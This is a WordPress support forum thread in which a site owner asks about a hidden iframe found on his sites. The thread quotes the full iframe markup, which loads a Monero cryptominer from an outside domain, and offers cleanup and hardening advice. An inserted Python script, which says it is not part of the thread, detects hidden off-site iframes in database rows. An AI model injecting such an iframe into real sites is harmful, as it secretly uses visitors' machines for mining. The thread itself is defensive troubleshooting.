Found miner?

  • mattish.91

    (@mattish91)


    So, I found this code in all WordPress sites that I have visited since yesterday and would like to know some more on it. I'm going to look through the code that is included with this, and also which file is including this script on our site. I would also like to know if your website has this script and if you know what it might be. I have looked at the original website of this script and it seems that it indeed is a Monero miner script that is included with WordPress, or at least running on all the setups of WordPress I have ever made… and now I think it looks suspicious that it comes from specifically a Monero miner website…

    Code included with WordPress:
    <iframe style="display: none;" src="https://devappgrant.space/lib/iframe.html?u=51807_5522&t=0.8"></iframe>

    Monero mining website?:
    https://devappgrant.space

    If you have any idea of what this specific script does, please let me know. I'm thrilled.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Moderator Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    mattish.91

    (@mattish91)

    Wordfence did not find anything, I'll check with Sucuri as well. But this code surely seems odd to me that this even is there… very suspicious…

    te_taipo

    (@te_taipo)

    The malicious code is hosted offsite, so it would be very difficult for any plugin to detect it.

    It is most certainly a malicious <iframe> that loads a JavaScript cryptocurrency miner into the browser of anyone viewing pages on your website.

    What you need to do is run through the fix-it guide above to clean out the <iframe> code from your website, then you need to work out how an attacker was able to install the malicious <iframe> into your website (in order to prevent it from happening again).

    mattish.91

    (@mattish91)

    I have been looking through the files of my installation, and I can’t find anything that is not what it’s supposed to be. I have compared files with a fresh install of WordPress, and the files are not different than what I have modified myself. I'm literally clueless about what appeared here. It might be a plugin though, so I'll probably have to check that out as well. Since most of my websites use Yoast, Page Builder and Jetpack, I believe it might be one of those plugins causing it, but not sure yet. Still investigating this…

    Do you find that in the bottom of your WordPress installation and do you use any of the following plugins on your site?

    mattish.91

    (@mattish91)

    I have been taking some precautions by changing the admin account username and password, changing the database username and password, changing the login page location, as well as changing some common WordPress directories by hard-coding the locations of themes and files. I have updated my htaccess file to match the security it deserves, as well as limiting the R/W access to only be used by the Apache user. I'm also doing a full system scan with ClamAV to make sure the system is not compromised in any other way. I have checked the open ports of my firewall server and it seems everything is closed as much as it could be without interfering with the hosting and the web server. I also made sure nothing else was compromised with the Apache config as well as the PHP config, just to make sure nothing unnecessary is used while not needed.

    • This reply was modified 1 year ago by  mattish.91.
    te_taipo

    (@te_taipo)

    Without being able to see your website, I can only take guesses. So with that in mind, the injection of the code could be in the database itself. If you have access to your database, check the posts, and also another favourite place attackers hide their code, in the post meta tags.
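    One way to carry out the database check suggested above, as an added example that is not part of the original thread: rather than searching only for the one known domain, it flags any hidden, off-site <iframe> in exported row content. The function names, the (table, row id, HTML) row shape, the site host example.test and the "hidden" heuristics are assumptions made for illustration; only the iframe markup comes from the thread.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that make an iframe invisible to visitors (heuristic).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)",
    re.I)

class IframeFinder(HTMLParser):
    """Collects (src_host, hidden) for every <iframe> in an HTML fragment."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        hidden = (bool(HIDDEN_STYLE.search(a.get("style", "")))
                  or a.get("width") == "0" or a.get("height") == "0")
        self.found.append((host, hidden))

def scan_rows(rows, site_host):
    """rows: iterable of (table, row_id, html). Returns hidden off-site iframes."""
    hits = []
    for table, row_id, html in rows:
        finder = IframeFinder()
        finder.feed(html)
        for host, hidden in finder.found:
            # Off-site: a host that is neither the site itself nor a subdomain of it.
            offsite = bool(host) and host != site_host and not host.endswith("." + site_host)
            if hidden and offsite:
                hits.append((table, row_id, host))
    return hits

# Constructed sample rows, shaped like exports of wp_posts.post_content and
# wp_postmeta.meta_value; row ids and surrounding markup are made up.
SAMPLE_ROWS = [
    ("wp_posts", 12, '<p>Hi</p><iframe src="https://www.youtube.com/embed/x" width="560"></iframe>'),
    ("wp_posts", 31, '<p>News</p><iframe style="display: none;" '
                     'src="https://devappgrant.space/lib/iframe.html?u=51807_5522&t=0.8"></iframe>'),
    ("wp_postmeta", 77, '<IFRAME SRC="//devappgrant.space/lib/iframe.html" height="0"></IFRAME>'),
    ("wp_postmeta", 78, '<iframe style="display:none" src="https://example.test/form"></iframe>'),
]

print(scan_rows(SAMPLE_ROWS, "example.test"))
```

    A visible embed (row 12) and a hidden same-site frame (row 78) are not reported; a clean result here does not rule out injection through theme or plugin files or an included script.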

  • The topic ‘Found miner?’ is closed to new replies.